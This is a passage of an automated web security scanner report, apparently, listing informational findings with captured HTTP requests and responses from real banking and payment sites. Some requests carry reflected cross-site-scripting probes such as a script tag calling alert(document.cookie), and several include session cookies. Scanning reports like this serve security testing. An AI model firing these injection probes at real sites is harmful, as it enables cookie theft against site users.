
Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Wed, 02 Feb 2011 22:11:31 GMT
Expires: Wed, 02 Feb 2011 22:11:31 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

25.14. http://image.wareseeker.com/software/78/index_565291.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.wareseeker.com
Path:   /software/78/index_565291.gif

Request

GET /software/78/index_565291.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:27 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 571

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...

25.15. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 02 Feb 2011 22:11:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

25.16. http://news.google.com/intl/en_us/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /intl/en_us/about.html

Request

GET /intl/en_us/about.html HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 04:42:49 GMT
Date: Thu, 03 Feb 2011 01:04:12 GMT
Expires: Thu, 03 Feb 2011 01:04:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>About Google</title>
<link href="http://www.google.com/css/gcs.css" rel="stylesheet">
<style>
h1 {
color:#636363;
float:left;
font
...[SNIP]...

25.17. https://online.wellsfargo.com/common/html/wibdisc.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /common/html/wibdisc.html

Request

GET /common/html/wibdisc.html HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:02:13 GMT
Content-length: 151726
Content-type: text/html
Last-modified: Tue, 22 Jun 2010 00:49:05 GMT
Etag: "250ae-4c200881"
Accept-ranges: bytes
Connection: close

<html>
<head>
<a NAME="top"></a>
<title>Online Access Agreement</title>


<LINK REL="stylesheet" TYPE="text/css" HREF="../styles/wib-wf.css">
<LINK REL="stylesheet" TYPE="text/css" HREF="../styles/NS6
...[SNIP]...

25.18. https://secure.opinionlab.com/pageviewer/pv_controlboard.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /pageviewer/pv_controlboard.html

Request

GET /pageviewer/pv_controlboard.html HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 100
Content-Type: text/html
Last-Modified: Fri, 12 Jan 2007 19:33:13 GMT
Accept-Ranges: bytes
ETag: "4d9042808036c71:206b"
Date: Wed, 02 Feb 2011 22:02:29 GMT
Connection: close

<% Response.Redirect "https://pageviewer.opinionlab.com/pv_controlboard.html?url="&Request("url") %>

25.19. https://secure.opinionlab.com/rate36s.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:02:16 GMT
Connection: close

invalid call method

25.20. http://sr2.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sr2.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LivePersonID=LP i=16101423669632,d=1294435351;

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86399
Date: Thu, 03 Feb 2011 01:04:59 GMT
Connection: close

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

25.21. http://usa.visa.com/ext/nav/footer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /ext/nav/footer.html

Request

GET /ext/nav/footer.html HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Referer: http://usa.visa.com/personal/security/get-help-now.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visaHome=0; __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; __utmc=60493353; __utmb=60493353.6.9.1296684032693

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 10 Jan 2011 21:25:21 GMT
Accept-Ranges: bytes
ETag: "80369fe2cb1cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:59:36 GMT
Connection: close
P3P:
Content-Length: 1725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="javasc
...[SNIP]...

25.22. http://usa.visa.com/js/customanalink.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /js/customanalink.js

Request

GET /js/customanalink.js HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 09 Sep 2006 00:25:17 GMT
ETag: "8054cc6ca6d3c61:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:02:49 GMT
Content-Length: 1547
Connection: close
P3P:

<html>
<head>
<script language="JavaScript">
var requestUrl = location.toString();
document.location.href = "/visaError/index.jsp?requestPath=" + escape(requestUrl);
</scr
...[SNIP]...

25.23. http://usa.visa.com/personal/security/protect_yourself/common_frauds/phishing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /personal/security/protect_yourself/common_frauds/phishing.html

Request

GET /personal/security/protect_yourself/common_frauds/phishing.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 09 Sep 2006 00:25:17 GMT
ETag: "8054cc6ca6d3c61:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:02:52 GMT
Content-Length: 1547
Connection: close
P3P:

<html>
<head>
<script language="JavaScript">
var requestUrl = location.toString();
document.location.href = "/visaError/index.jsp?requestPath=" + escape(requestUrl);
</scr
...[SNIP]...

25.24. http://usa.visa.com/personal/security/protect_yourself/visa_security_tips.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /personal/security/protect_yourself/visa_security_tips.html

Request

GET /personal/security/protect_yourself/visa_security_tips.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 09 Sep 2006 00:25:17 GMT
ETag: "8054cc6ca6d3c61:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:02:52 GMT
Content-Length: 1547
Connection: close
P3P:

<html>
<head>
<script language="JavaScript">
var requestUrl = location.toString();
document.location.href = "/visaError/index.jsp?requestPath=" + escape(requestUrl);
</scr
...[SNIP]...

25.25. http://usa.visa.com/personal/security/vbv/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /personal/security/vbv/index.html

Request

GET /personal/security/vbv/index.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 09 Sep 2006 00:25:17 GMT
ETag: "8054cc6ca6d3c61:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:02:51 GMT
Content-Length: 1547
Connection: close
P3P:

<html>
<head>
<script language="JavaScript">
var requestUrl = location.toString();
document.location.href = "/visaError/index.jsp?requestPath=" + escape(requestUrl);
</scr
...[SNIP]...

25.26. http://usa.visa.com/sitewide/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /sitewide/sitemap.html

Request

GET /sitewide/sitemap.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 13 Jul 2010 00:44:52 GMT
ETag: "05ab69a2422cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:00:33 GMT
Content-Length: 18946
Connection: close
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <style type="text/css">
...[SNIP]...

25.27. http://usbank.com/privacy_pledge.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usbank.com
Path:   /privacy_pledge.html

Request

GET /privacy_pledge.html HTTP/1.1
Host: usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Wed, 02 Feb 2011 22:03:01 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 07 Sep 2005 17:36:46 GMT
ETag: "0beab7d2b3c51:10bb"
Content-Length: 341

<!-- 09/07/05 Haskins SR12691 -->

<HTML>
<HEAD>
<SCRIPT language="JavaScript1.1">
<!--
location.replace("/cgi_w/cfm/about/privacy/privacy_pledge.cfm");
//-->
</SCRIPT>
<NOSCRIPT>
<M
...[SNIP]...

25.28. http://vendorweb.citibank.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vendorweb.citibank.com
Path:   /HG

Request

GET /HG HTTP/1.1
Host: vendorweb.citibank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CTG=1296684000; WSS_GW=V1z%B^eeiCrrr; DM550608DPBRV6=V1rrrrr"rz%B^eeiCrrr%^re^Cz%zrzr"%B^eeiCrrrz%B^eeiCrrr"%B^eeiCrrr"%B^eeiCrrr%^re^C"rz]%6%B^eeiCrrr6%z(xB$5><0xB$':maxB$52f2xBr':maz7}z)O:ma6r"OuKr6%XzA65><06':ma652f2H':mazu::dmIhd;

Response

HTTP/1.1 400 Bad Request
Date: Wed, 02 Feb 2011 22:03:02 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Wed, 02 Feb 2011 22:03:03 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

25.29. http://redcated/jaction/avevao_SOmainFooterIFrame_10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /jaction/avevao_SOmainFooterIFrame_10

Request

GET /jaction/avevao_SOmainFooterIFrame_10 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://usa.visa.com/?country=us&ep=v_gg_new&akamai=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 341
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 02 Feb 2011 21:58:59 GMT

function AT_ws(d,p,c){if(typeof(d)!='undefined'&&d.createElement){var l=p=='http:'?'http://spd.netconversions.com/':'https://a248.e.akamai.net/atlas.download.akamai.com/';return ('<s'+'cript language=
...[SNIP]...

25.30. https://redcated/iaction/deupnc_PersonalBankingHome_4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://redcated
Path:   /iaction/deupnc_PersonalBankingHome_4

Request

GET /iaction/deupnc_PersonalBankingHome_4 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 834
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 02 Feb 2011 22:03:06 GMT
Connection: close

<html><body><img src="https://a248.e.akamai.net/img.redcated/images/pixel.gif" width="1" height="1" border="0" /><img src="https://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_PNC/Retarg
...[SNIP]...

25.31. http://wealthmanagement.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wealthmanagement.bankofamerica.com
Path:   /

Request

GET / HTTP/1.1
Host: wealthmanagement.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:08 GMT
Content-length: 137
Content-type: text/html
Last-modified: Sat, 26 Aug 2006 22:34:48 GMT
Etag: "89-44f0cc88"
Accept-ranges: bytes
Connection: close

<HTML>
<HEAD>
<meta HTTP-EQUIV="REFRESH" CONTENT="0; URL=https://wealthmanagement.bankofamerica.com">
</HEAD>
<BODY>
</BODY>
</HTML>


25.32. https://www.1sttools.com/loginout/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.1sttools.com
Path:   /loginout/login.asp

Request

GET /loginout/login.asp HTTP/1.1
Host: www.1sttools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11382
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/
Cache-control: private


<html>
<head>
   <title>LendingTools.com</title>
</head>


   <body onLoad="hndOnLoad();document.forms[0].username.focus();" bgcolor="#FFFFFF" leftmargin="0" topmargin="0" rightmargin="0">



...[SNIP]...

25.33. http://www.arbornetworks.com/en/contact-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:52:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Length: 174
Connection: close
Content-Type: text/html

<br />
<b>Parse error</b>: syntax error, unexpected $end, expecting T_VARIABLE or '$' in <b>/usr/local/htdocs/components/com_sef/cache/cache.php</b> on line <b>45</b><br />

25.34. http://www.bankofamerica.com/deposits/checksave491c6%22%3E%3Cscript%3Ealert(1)%3C/script%3E20cb5e334dd/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave491c6%22%3E%3Cscript%3Ealert(1)%3C/script%3E20cb5e334dd/index.cfm

Request

GET /deposits/checksave491c6%22%3E%3Cscript%3Ealert(1)%3C/script%3E20cb5e334dd/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CFID=131550827; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; throttle_value=21; NSC_CbolPgBnfsjdb=445b32097852; BIGipServerngen-www.80=1604761259.20480.0000

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 05 Feb 2011 18:59:06 GMT
Content-type: text/html
Page-Completion-Status: Normal
Content-Length: 1392


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...

25.35. https://www.chase.com/online/Home/Chase-Home.dwt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/Home/Chase-Home.dwt

Request

GET /online/Home/Chase-Home.dwt HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 404 Not found
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:31 GMT
Content-length: 208
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" Content="0; URL=http://www.chase.com/cm/cs?pagename=Chase/Href&urlname=chase/cc/sitehelp/notfound">
</HEAD>


...[SNIP]...

25.36. https://www.chase.com/online/auto-loan/car-loan.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/auto-loan/car-loan.html

Request

GET /online/auto-loan/car-loan.html HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 404 Not found
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:33 GMT
Content-length: 208
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" Content="0; URL=http://www.chase.com/cm/cs?pagename=Chase/Href&urlname=chase/cc/sitehelp/notfound">
</HEAD>


...[SNIP]...

25.37. https://www.chase.com/wamuwelcome3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /wamuwelcome3/

Request

GET /wamuwelcome3/ HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:50 GMT
Content-length: 14892
Content-type: text/html
Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 06 Jan 2011 22:25:12 GMT
Etag: "3a2c-4d264148"
Accept-ranges: bytes

<html LANG="EN" >

<head>
<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>
<script language="Javascript1.2" type="text/javascript">
<!--
...[SNIP]...

25.38. http://www.citi.com/CBOL/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /CBOL/Home

Request

GET /CBOL/Home HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:50 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.39. http://www.citi.com/JRS/helpcenter/getHelpContent.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /JRS/helpcenter/getHelpContent.do

Request

GET /JRS/helpcenter/getHelpContent.do?dispFormat=main&contentId=FindABARoutingNumber&contentType=category HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:49 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.40. http://www.citi.com/domain/disclaim/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/disclaim/

Request

GET /domain/disclaim/ HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
